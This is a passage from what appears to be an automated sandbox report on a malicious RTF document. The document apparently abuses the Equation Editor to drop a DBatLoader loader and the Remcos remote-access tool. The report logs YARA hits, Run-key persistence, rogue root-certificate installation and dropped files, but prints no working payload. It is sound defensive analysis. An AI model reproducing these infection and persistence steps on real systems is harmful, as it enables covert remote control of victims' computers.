                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                        Source: OKhCyJ619J.LNK.0.drLNK file: ..\..\..\..\..\Desktop\OKhCyJ619J.rtf
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr
                        Source: Binary string: easinvoker.pdbH source: hjc.exe, 00000005.00000003.369109514.000000001573E000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr

                        Data Obfuscation

                        barindex
                        Yara detected DBatLoader
                        Source: Yara matchFile source: 5.2.hjc.exe.318e1e0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.Rdxcjsng.PIF.3003d38.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.312984c.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.Rdxcjsng.PIF.2fe2a1c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.Rdxcjsng.PIF.3003d38.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.318e1e0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.316cd44.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.3230000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493989881.0000000003191000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.432128684.0000000003321000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.465177486.00000000030A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.396855031.00000000031D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA6A63 LoadLibraryA,GetProcAddress,5_2_15CA6A63
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .
                        Source: remcos.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: HJC[1].exe.2.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: hjc.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: netutils.dll.5.drStatic PE information: real checksum: 0x2c00d should be: 0x1f08e
                        Source: Rdxcjsng.PIF.8.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: /4
                        Source: netutils.dll.5.drStatic PE information: section name: /19
                        Source: netutils.dll.5.drStatic PE information: section name: /31
                        Source: netutils.dll.5.drStatic PE information: section name: /45
                        Source: netutils.dll.5.drStatic PE information: section name: /57
                        Source: netutils.dll.5.drStatic PE information: section name: /70
                        Source: netutils.dll.5.drStatic PE information: section name: /81
                        Source: netutils.dll.5.drStatic PE information: section name: /92
                        Source: easinvoker.exe.5.drStatic PE information: section name: .imrsiv
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540140 push esi; retf 2_2_03540171
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540160 push esi; retf 2_2_03540171
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD4E56 push ecx; ret 5_2_15CD4E69
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CF7A28 push eax; ret 5_2_15CF7A46
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03236372 push 032363CFh; ret 5_2_032363C7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03236374 push 032363CFh; ret 5_2_032363C7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324D20C push ecx; mov dword ptr [esp], edx5_2_0324D211
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A2F4 push 0325A35Fh; ret 5_2_0325A357
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032332F0 push eax; ret 5_2_0323332C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A144 push 0325A1ECh; ret 5_2_0325A1E4
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A1F8 push 0325A288h; ret 5_2_0325A280
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03243027 push 03243075h; ret 5_2_0324306D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03243028 push 03243075h; ret 5_2_0324306D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A0AC push 0325A125h; ret 5_2_0325A11D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323673E push 03236782h; ret 5_2_0323677A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03236740 push 03236782h; ret 5_2_0323677A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323C528 push ecx; mov dword ptr [esp], edx5_2_0323C52D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323D55C push 0323D588h; ret 5_2_0323D580
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03249B58 push 03249B90h; ret 5_2_03249B88
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03259B58 push 03259D76h; ret 5_2_03259D6E
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323CBA8 push 0323CD2Eh; ret 5_2_0323CD26
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03246904 push 032469AFh; ret 5_2_032469A7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03246902 push 032469AFh; ret 5_2_032469A7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032478C8 push 03247945h; ret 5_2_0324793D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323C8D6 push 0323CD2Eh; ret 5_2_0323CD26
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03242F1C push 03242F92h; ret 5_2_03242F8A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325DF18 push eax; ret 5_2_0325DFE8
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03245E38 push ecx; mov dword ptr [esp], edx5_2_03245E3A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247CA6 push 03247CE0h; ret 5_2_03247CD8
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247CA8 push 03247CE0h; ret 5_2_03247CD8
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE92806 push ecx; ret 9_2_2DE92819

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Rdxcjsng.PIFJump to dropped file
                        Installs new ROOT certificates
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540451 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540451
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hjc.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Rdxcjsng.PIFJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file

                        Boot Survival

                        barindex
                        Creates autostart registry keys with suspicious names
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
                        Creates multiple autostart registry keys
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RdxcjsngJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RdxcjsngJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RdxcjsngJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03249B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_03249B94
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
